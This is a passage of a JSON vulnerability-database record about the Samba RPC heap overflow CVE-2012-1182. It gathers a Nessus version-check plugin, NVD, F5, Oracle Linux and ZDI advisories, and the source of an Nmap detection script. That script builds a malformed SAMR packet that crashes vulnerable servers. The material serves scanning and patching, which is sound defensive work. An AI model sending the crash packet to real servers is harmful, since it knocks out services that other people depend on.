"CVE_2012_1182_NONX"]}, {"type": "openvas", "idList": ["OPENVAS:864213", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310870928", "OPENVAS:881680", "OPENVAS:870584", "OPENVAS:1361412562310840980", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310123940", "OPENVAS:840980"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}, {"type": "centos", "idList": ["CESA-2013:0506", "CESA-2013:0515", "CESA-2012:0465", "CESA-2012:0466"]}, {"type": "nessus", "idList": ["SL_20130221_SAMBA4_ON_SL6_X.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "ORACLELINUX_ELSA-2013-0515.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "OPENSUSE-2012-224.NASL", "DEBIAN_DSA-2450.NASL", "FEDORA_2012-6382.NASL", "FEDORA_2012-6349.NASL", "SL_20120410_SAMBA3X_ON_SL5_X.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:21850"]}, {"type": "ubuntu", "idList": ["USN-1423-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116953", "PACKETSTORM:116843"]}, {"type": "debian", "idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DSA-2450-1:77F45"]}], "modified": "2020-04-01T02:36:52"}, "score": {"value": 9.3, "vector": "NONE", "modified": "2020-04-01T02:36:52"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "naslFamily": "Misc.", "pluginID": "58662", "cpe": ["cpe:/a:samba:samba"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:12:21", "bulletinFamily": "NVD", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "modified": "2018-10-30T16:25:00", "id": "CVE-2012-1182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1182", "published": "2012-04-10T21:55:00", "title": "CVE-2012-1182", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:13", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability. To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 9.x \n10.x \n11.x| None \nBIG-IP GTM| None| 9.x \n10.x \n11.x| None \nBIG-IP ASM| None| 9.x \n10.x \n11.x| None \nBIG-IP AAM| None| 11.x| None \nBIG-IP Link Controller| None| 9.x \n10.x \n11.x| None \nBIG-IP WebAccelerator| None| 9.x \n10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 6.x \n5.x| None \nNone \nNone\n\nNone \n\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2016-07-01T23:45:00", "published": "2012-07-10T20:45:00", "href": "https://support.f5.com/csp/article/K13719", "id": "F5:K13719", "title": "Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2012-1182 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-01T00:00:00", "published": "2012-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/700/sol13719.html", "id": "SOL13719", "title": "SOL13719 - Samba vulnerability CVE-2012-1182", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-05-30T17:05:41", "bulletinFamily": "scanner", "description": "Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182. \n\nSamba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the \"root\" user from an anonymous connection. \n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in PIDL based autogenerated code. This check script is based on PoC by ZDI marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray function where an attacker is under control of num_sids and can cause insufficient memory to be allocated, leading to heap buffer overflow and possibility of remote code execution. \n\nScript builds a malicious packet and makes a SAMR GetAliasMembership call which triggers the vulnerability. On the vulnerable system, connection is dropped and result is \"Failed to receive bytes after 5 attempts\". On patched system, samba throws an error and result is \"MSRPC call returned a fault (packet type)\". \n\nReferences: \n\n * https://bugzilla.samba.org/show_bug.cgi?id=8815\n * http://www.samba.org/samba/security/CVE-2012-1182\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 139/tcp open netbios-ssn\n \n Host script results:\n | samba-vuln-cve-2012-1182:\n | VULNERABLE:\n | SAMBA remote heap overflow\n | State: VULNERABLE\n | IDs: CVE:CVE-2012-1182\n | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n | Description:\n | Samba versions 3.6.3 and all versions previous to this are affected by\n | a vulnerability that allows remote code execution as the \"root\" user\n | from an anonymous connection.\n |\n | Disclosure date: 2012-03-15\n | References:\n | http://www.samba.org/samba/security/CVE-2012-1182\n |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\n## Requires \n\n * msrpc\n * smb\n * string\n * vulns\n * stdnse\n\n* * *\n", "modified": "2018-09-05T21:57:41", "published": "2012-04-21T22:44:23", "id": "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "href": "https://nmap.org/nsedoc/scripts/samba-vuln-cve-2012-1182.html", "title": "samba-vuln-cve-2012-1182 NSE Script", "type": "nmap", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n\n\nCVE-2012-1182 marks multiple heap overflow vulnerabilities located in\nPIDL based autogenerated code. This check script is based on PoC by ZDI\nmarked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray\nfunction where an attacker is under control of num_sids and can cause\ninsufficient memory to be allocated, leading to heap buffer overflow\nand possibility of remote code execution.\n\nScript builds a malicious packet and makes a SAMR GetAliasMembership\ncall which triggers the vulnerability. On the vulnerable system,\nconnection is dropped and result is \"Failed to receive bytes after 5 attempts\".\nOn patched system, samba throws an error and result is \"MSRPC call\nreturned a fault (packet type)\".\n\nReferences:\n* https://bugzilla.samba.org/show_bug.cgi?id=8815\n* http://www.samba.org/samba/security/CVE-2012-1182\n\n]]\n\n-----------------------------------------------------------------------\n---\n-- @usage\n-- nmap --script=samba-vuln-cve-2012-1182 -p 139 <target>\n-- @output\n-- PORT STATE SERVICE\n-- 139/tcp open netbios-ssn\n--\n-- Host script results:\n-- | samba-vuln-cve-2012-1182:\n-- | VULNERABLE:\n-- | SAMBA remote heap overflow\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2012-1182\n-- | Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n-- | Description:\n-- | Samba versions 3.6.3 and all versions previous to this are affected by\n-- | a vulnerability that allows remote code execution as the \"root\" user\n-- | from an anonymous connection.\n-- |\n-- | Disclosure date: 2012-03-15\n-- | References:\n-- | http://www.samba.org/samba/security/CVE-2012-1182\n-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\",\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host,port)\n\n local result, stats\n local response = {}\n\n local samba_cve = {\n title = \"SAMBA remote heap overflow\",\n IDS = {CVE = 'CVE-2012-1182'},\n risk_factor = \"HIGH\",\n scores = {\n CVSSv2 = \"10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)\",\n },\n description = [[\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n]],\n references = {\n 'http://www.samba.org/samba/security/CVE-2012-1182',\n },\n dates = {\n disclosure = {year = '2012', month = '03', day = '15'},\n },\n exploit_results = {},\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n samba_cve.state = vulns.STATE.NOT_VULN\n\n -- create SMB session\n local status, smbstate\n status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)\n if(status == false) then\n return false, smbstate\n end\n\n -- bind to SAMR service\n local bind_result\n status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n return false, bind_result\n end\n\n -- create malicious packet, same as in the PoC\n local data = string.pack(\"<I4\",4096) -- num_sids\n .. \"abcd\"\n ..string.pack(\"<I4I4I4\",100\n ,0\n ,100)\n ..string.rep(\"a\",1000)\n\n local marshaledHandle = string.rep(\"X\",20)\n status, result = msrpc.samr_getaliasmembership(smbstate,marshaledHandle, data)\n stdnse.debug2(\"msrpc.samr_getaliasmembership: %s, '%s'\", status, result)\n if(status == false and string.find(result,\"Failed to receive bytes after 5 attempts\") ~= nil) then\n samba_cve.state = vulns.STATE.VULN -- connection dropped, server crashed\n end\n\n return report:make_output(samba_cve)\n\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:53:36", "bulletinFamily": "exploit", "description": "CVE ID: CVE-2012-1182\r\n\r\nSamba\u662f\u4e00\u5957\u5b9e\u73b0SMB\uff08Server Messages Block\uff09\u534f\u8bae\u3001\u8de8\u5e73\u53f0\u8fdb\u884c\u6587\u4ef6\u5171\u4eab\u548c\u6253\u5370\u5171\u4eab\u670d\u52a1\u7684\u7a0b\u5e8f\u3002\r\n\r\nSamba 3.6.3\u4e4b\u524d\u7248\u672c\u7684RPC\u4ee3\u7801\u751f\u6210\u5668\u5b58\u5728\u9519\u8bef\uff0c\u5bfc\u81f4\u751f\u6210\u7684\u4ee3\u7801\u4e2d\u5305\u542b\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u4e9b\u751f\u6210\u7684\u4ee3\u7801\u7528\u5728Samba\u63a7\u5236RPC\u7f51\u7edc\u6570\u636e\u5904\u7406\u7684\u90e8\u5206\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u7279\u5236\u7684RPC\u8c03\u7528\u65e0\u9700\u7528\u6237\u9a8c\u8bc1\u9020\u6210\u670d\u52a1\u5668\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nSamba &lt; 3.6.3\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSamba\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.samba.org/", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60050", "id": "SSV:60050", "type": "seebug", "title": "Samba &lt; 3.6.3 \u7248\u672cndr_pull_lsa_SidArray\u5806\u6ea2\u51fa\u6f0f\u6d1e(CVE-2012-1182)", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "unix", "description": "[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "modified": "2012-04-16T00:00:00", "published": "2012-04-16T00:00:00", "id": "ELSA-2012-0478", "href": "http://linux.oracle.com/errata/ELSA-2012-0478.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:45", "bulletinFamily": "unix", "description": "[3.5.10-115]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804644", "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "ELSA-2012-0465", "href": "http://linux.oracle.com/errata/ELSA-2012-0465.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "unix", "description": "evolution-mapi\r\n[0.28.3-12]\r\n- Add patch for RH bug #903241 (Double-free on message copy/move)\r\n \n[0.28.3-11]\r\n- Add patch for RH bug #902932 (Cannot connect with latest samba)\r\n \n[0.28.3-10]\r\n- Drop multilib by obsoleting evolution-mapi < 0.28.3-9 (RH bug #886914).\r\n \n[0.28.3-9]\r\n- Adapt to OpenChange 1.0 (RH bug #767678).\r\n \n[0.28.3-8]\r\n- Add patch for RH bug #680061 (crash while setting props).\r\n \nopenchange\r\n[1.0-4]\r\n- Use current version (1.0-4) for a multilib obsolete (RH bug #881698).\r\n \n[1.0-3]\r\n- Add patch to be able to send large messages (RH bug #870405)\r\n \n[1.0-2]\r\n- Drop multilib by obsoleting openchange < 0.9 (RH bug #881698).\r\n \n[1.0-1]\r\n- Rebase to 1.0 using the rpm spec from Fedora 18.", "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0515", "href": "http://linux.oracle.com/errata/ELSA-2013-0515.html", "title": "openchange security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "unix", "description": "[3.5.10-0.108]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804650", "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "ELSA-2012-0466", "href": "http://linux.oracle.com/errata/ELSA-2012-0466.html", "title": "samba3x security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "unix", "description": "[4.0.0-55.rc4]\r\n- Fix dependencies of samba4-test package.\r\n- related: #896142\r\n \n[4.0.0-54.rc4]\r\n- Fix summary and description of dc subpackages.\r\n- resolves: #896142\r\n- Remove conflicting libsmbclient.7 manpage.\r\n- resolves: #896240\r\n \n[4.0.0-53.rc4]\r\n- Fix provides filter rules to remove conflicting libraries from samba4-libs.\r\n- resolves: #895718\r\n \n[4.0.0-52.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-51.rc4]\r\n- Make sure we use the same directory as samba package for the winbind pipe.\r\n- resolves: #886157\r\n \n[4.0.0-50.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-49.rc4]\r\n- Fix Netlogon AES encryption.\r\n- resolves: #885089\r\n \n[4.0.0-48.rc4]\r\n- Fix IPA trust AD lookup of users.\r\n- resolves: #878564\r\n \n[4.0.0-47.rc4]\r\n- Add require for krb5-libs >= 1.10 to samba4-libs.\r\n- resolves: #877533\r\n \n[4.0.0-46.rc4]\r\n- Rename /etc/sysconfig/samba4 to name to mach init scripts.\r\n- resolves: #877085\r\n \n[4.0.0-45.rc4]\r\n- Don't require samba4-common and samba4-test in samba4-devel package.\r\n- related: #871748\r\n \n[4.0.0-44.rc4]\r\n- Make libnetapi and internal library to fix dependencies.\r\n- resolves: #873491\r\n \n[4.0.0-43.rc4]\r\n- Move libnetapi and internal printing migration lib to libs package.\r\n- related: #766333\r\n \n[4.0.0-42.rc4]\r\n- Fix perl, pam and logrotate dependencies.\r\n- related: #766333\r\n \n[4.0.0-41.rc4]\r\n- Fix library dependencies found by rpmdiff.\r\n- Update winbind offline logon patch.\r\n- related: #766333\r\n \n[4.0.0-40.rc4]\r\n- Move libgpo to samba-common\r\n- resolves: #871748\r\n \n[4.0.0-39.rc4]\r\n- Rebase to version 4.0.0rc4.\r\n- related: #766333\r\n \n[4.0.0-38.rc3]\r\n- Add missing export KRB5CCNAME in init scripts.\r\n- resolves: #868419\r\n \n[4.0.0-37.rc3]\r\n- Move /var/log/samba to samba-common package for winbind which\r\n requires it.\r\n- resolves: #868248\r\n \n[4.0.0-36.rc3]\r\n- The standard auth modules need to be built into smbd to function.\r\n- resolves: #867854\r\n \n[4.0.0-35.rc3]\r\n- Move pam_winbind.conf to the package of the module.\r\n- resolves: #867317\r\n \n[4.0.0-34.rc3]\r\n- Built auth_builtin as static module.\r\n- related: #766333\r\n \n[4.0.0-33.rc3]\r\n- Add back the AES patches which didn't make it in rc3.\r\n- related: #766333\r\n \n[4.0.0-32.rc3]\r\n- Rebase to version 4.0.0rc3.\r\n- related: #766333\r\n \n[4.0.0-31.rc2]\r\n- Use alternatives to configure winbind_krb5_locator.so\r\n- resolves: #864889\r\n \n[4.0.0-30.rc2]\r\n- Fix multilib package installation.\r\n- resolves: #862047\r\n- Filter out libsmbclient and libwbclient provides.\r\n- resolves: #861892\r\n- Rebase to version 4.0.0rc2.\r\n- related: #766333\r\n \n[4.0.0-29.rc1]\r\n- Fix Requires and Conflicts.\r\n- related: #766333\r\n \n[4.0.0-28.rc1]\r\n- Move pam_winbind and wbinfo manpages to the right subpackage.\r\n- related: #766333\r\n \n[4.0.0-27.rc1]\r\n- Fix permission for init scripts.\r\n- Define a common KRB5CCNAME for smbd and winbind.\r\n- Set piddir back to /var/run in RHEL6.\r\n- related: #766333\r\n \n[4.0.0-26.rc1]\r\n- Add '-fno-strict-aliasing' to CFLAGS again.\r\n- related: #766333\r\n \n[4.0.0-25.rc1]\r\n- Build with syste libldb package which has been just added.\r\n- related: #766333\r\n \n[4.0.0-24.rc1]\r\n- Rebase to version 4.0.0rc1.\r\n- resolves: #766333", "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0506", "href": "http://linux.oracle.com/errata/ELSA-2013-0506.html", "title": "samba4 security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2016-11-09T00:17:54", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the way Samba handles ReportEventW requests. When parsing the data send in the request Samba uses the field 'strings' to create a heap allocation but then uses another field, 'num_of_strings', to write data to the allocation. Because there is no check to see if 'num_of_strings' is smaller than 'strings' this could result in a heap buffer overflow that could lead to remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-072", "id": "ZDI-12-072", "title": "Samba ReportEventW Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within Samba's handling of a NDR PULL DFS INFO3 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-061", "id": "ZDI-12-061", "title": "Samba ndr_pull_dfs_Info3 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:50", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the way Samba handles SetInfoPolicy requests. When parsing the data send in the request Samba uses the field 'settings' to create a heap allocation but then uses another field, 'count', to write data to the allocation. Because there is no check to see if 'count' is smaller than 'settings' this could result in a heap buffer overflow that could lead to remote code execution.", "modified": "2012-11-09T00:00:00", "published": "2012-04-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-069", "id": "ZDI-12-069", "title": "Samba SetInfoPolicy AuditEventsInfo Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:53", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the way Samba handles ndr_ValidatePassword requests. When parsing the data send in the request Samba uses the field 'pwd_history' to create a heap allocation but then uses another field, 'pwd_history_len', to write data to the allocation. Because there is no check to see if 'pwd_history_len' is smaller than 'pwd_history' this could result in a heap buffer overflow that could lead to remote code execution.", "modified": 